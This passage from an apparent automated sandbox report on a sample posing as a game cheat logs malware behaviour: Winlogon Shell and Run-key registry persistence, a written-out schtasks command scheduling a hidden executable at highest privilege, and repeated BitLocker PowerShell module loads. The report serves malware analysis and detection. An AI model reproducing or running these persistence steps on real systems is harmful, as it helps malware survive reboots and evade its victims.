                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverrefJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverrefJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverrefJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXalJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
